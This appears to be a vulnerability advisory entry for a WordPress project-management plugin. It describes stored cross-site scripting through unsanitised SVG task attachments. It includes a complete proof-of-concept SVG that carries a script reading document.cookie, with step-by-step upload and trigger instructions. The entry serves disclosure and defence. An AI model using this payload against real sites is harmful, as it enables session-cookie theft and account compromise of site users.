The plugin does not validate and sanitise task's attachments, which could allow any authenticated user (such as subscriber) creating a task to perform Stored Cross-Site Scripting by attaching a malicious SVG file
Create a SVG with the following content: <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg> As any authenticated user, such as subscriber: - Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks - Choose any tasks (create one if there aren't any) - Focus on "Write a comment". - Click on "Attach Files" and select the SVG created above - Click on "Send". - View the attached SVG by clicking on its URL (https://example.com/?wppm_attachment=86&tid=1&tac=OtjI9JpnQU), which will trigger the XSS
Rizacan Tufan
Rizacan Tufan
Yes
2022-09-15 (about 8 months ago)
2022-09-15 (about 8 months ago)
2022-09-15 (about 8 months ago)